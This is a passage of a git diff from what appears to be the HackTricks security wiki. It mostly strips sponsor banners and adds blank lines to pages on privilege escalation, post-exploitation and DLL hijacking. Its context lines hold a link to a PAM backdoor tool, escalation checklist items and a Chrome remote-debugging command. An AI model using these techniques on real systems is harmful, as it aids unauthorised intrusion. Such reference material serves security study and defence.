+++ b/src/linux-hardening/linux-environment-variables.md
@@ -122,3 +122,5 @@ One background job, one stopped and last command didn't finish correctly: ![](<../images/image (715).png>) {{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md
index 151691982..6d9940a1d 100644
--- a/src/linux-hardening/linux-post-exploitation/README.md
+++ b/src/linux-hardening/linux-post-exploitation/README.md
@@ -53,3 +53,5 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user > You can automate this process with [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
index f68fd334b..6701742a1 100644
--- a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
+++ b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
@@ -53,3 +53,5 @@ In a setup with multiple auth modules, the process follows a strict order. If th - [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/linux-privilege-escalation-checklist.md b/src/linux-hardening/linux-privilege-escalation-checklist.md
index 7e992863a..7c7726b69 100644
--- a/src/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/src/linux-hardening/linux-privilege-escalation-checklist.md
@@ -2,21 +2,6 @@ {{#include ../banners/hacktricks-training.md}}
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
 ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) ### [System Information](privilege-escalation/#system-information)
@@ -155,19 +140,6 @@ Stay informed with the newest bug bounties launching and crucial platform update - [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? - [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
 {{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/cisco-vmanage.md b/src/linux-hardening/privilege-escalation/cisco-vmanage.md
index d140dcd5a..6276e600b 100644
--- a/src/linux-hardening/privilege-escalation/cisco-vmanage.md
+++ b/src/linux-hardening/privilege-escalation/cisco-vmanage.md
@@ -159,3 +159,5 @@ bash-4.4# ``` {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
index 74f452daf..b3dac3ed6 100644
--- a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
@@ -50,3 +50,5 @@ docker-security/ {{#endref}} {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
index 5cf9f9815..b9a22e24a 100644
--- a/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -469,3 +469,5 @@ finish: - [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
index 1aa065326..7c7d2b99b 100644
--- a/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
+++ b/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
@@ -166,3 +166,5 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session" - [https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/) {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
index d2db5d66c..66d716c59 100644
--- a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
+++ b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
@@ -290,3 +290,5 @@ debug.debug() - [https://www.youtube.com/watch?v=UO618TeyCWo](https://www.youtube.com/watch?v=UO618TeyCWo) (Slides: [https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions\_-_Bucsay_Balazs.pdf](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf)) {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/euid-ruid-suid.md b/src/linux-hardening/privilege-escalation/euid-ruid-suid.md
index f9846b44b..b1a0ffc3a 100644
--- a/src/linux-hardening/privilege-escalation/euid-ruid-suid.md
+++ b/src/linux-hardening/privilege-escalation/euid-ruid-suid.md
@@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}}
-
-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
 ### User Identification Variables
@@ -215,10 +210,7 @@ uid=99(nobody) gid=99(nobody) euid=100 - [https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail](https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail)
-
-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/useful-linux-commands.md b/src/linux-hardening/useful-linux-commands.md
index 2ee9f1b39..eecf79889 100644
--- a/src/linux-hardening/useful-linux-commands.md
+++ b/src/linux-hardening/useful-linux-commands.md
@@ -1,13 +1,5 @@ # Useful Linux Commands
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 {{#include ../banners/hacktricks-training.md}} ## Common Bash
@@ -131,14 +123,6 @@ sudo chattr -i file.txt #Remove the bit so you can delete it 7z l file.zip ```
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 ## Bash for Windows ```bash
@@ -325,10 +309,3 @@ iptables -P OUTPUT ACCEPT {{#include ../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
diff --git a/src/online-platforms-with-api.md b/src/online-platforms-with-api.md
index 51e09bc72..09fb5715e 100644
--- a/src/online-platforms-with-api.md
+++ b/src/online-platforms-with-api.md
@@ -120,3 +120,4 @@ Search by domain and email and get if it was pwned and passwords. Commercial? {{#include ./banners/hacktricks-training.md}}
+
diff --git a/src/other-web-tricks.md b/src/other-web-tricks.md
index f442a4533..a17d557c7 100644
--- a/src/other-web-tricks.md
+++ b/src/other-web-tricks.md
@@ -2,13 +2,6 @@ {{#include ./banners/hacktricks-training.md}}
-
-
-**Get a hacker's perspective on your web apps, network, and cloud**
-
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 ### Host header
@@ -41,12 +34,7 @@ Developers might forget to disable various debugging options in the production e ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
-
-
-**Get a hacker's perspective on your web apps, network, and cloud**
-
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 {{#include ./banners/hacktricks-training.md}}
+
+
diff --git a/src/pentesting-dns.md b/src/pentesting-dns.md
index 8bd354c0a..ac44c461a 100644
--- a/src/pentesting-dns.md
+++ b/src/pentesting-dns.md
@@ -7,3 +7,5 @@ **DNS in IPv6** {{#include ./banners/hacktricks-training.md}}
+
+
diff --git a/src/post-exploitation.md b/src/post-exploitation.md
index 531f82530..71e3947dd 100644
--- a/src/post-exploitation.md
+++ b/src/post-exploitation.md
@@ -14,3 +14,5 @@ - [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review. {{#include ./banners/hacktricks-training.md}}
+
+
diff --git a/src/stealing-sensitive-information-disclosure-from-a-web.md b/src/stealing-sensitive-information-disclosure-from-a-web.md
index c24ee8094..157e415b1 100644
--- a/src/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/stealing-sensitive-information-disclosure-from-a-web.md
@@ -11,3 +11,5 @@ Here I present you the main ways to can try to achieve it: - [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). {{#include ./banners/hacktricks-training.md}}
+
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index b0dbd83ea..5b13574b1 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}}
-
-
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 ## Basic Information
@@ -238,11 +233,6 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser - [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e) - [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
-
-
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 {{#include ../../../banners/hacktricks-training.md}}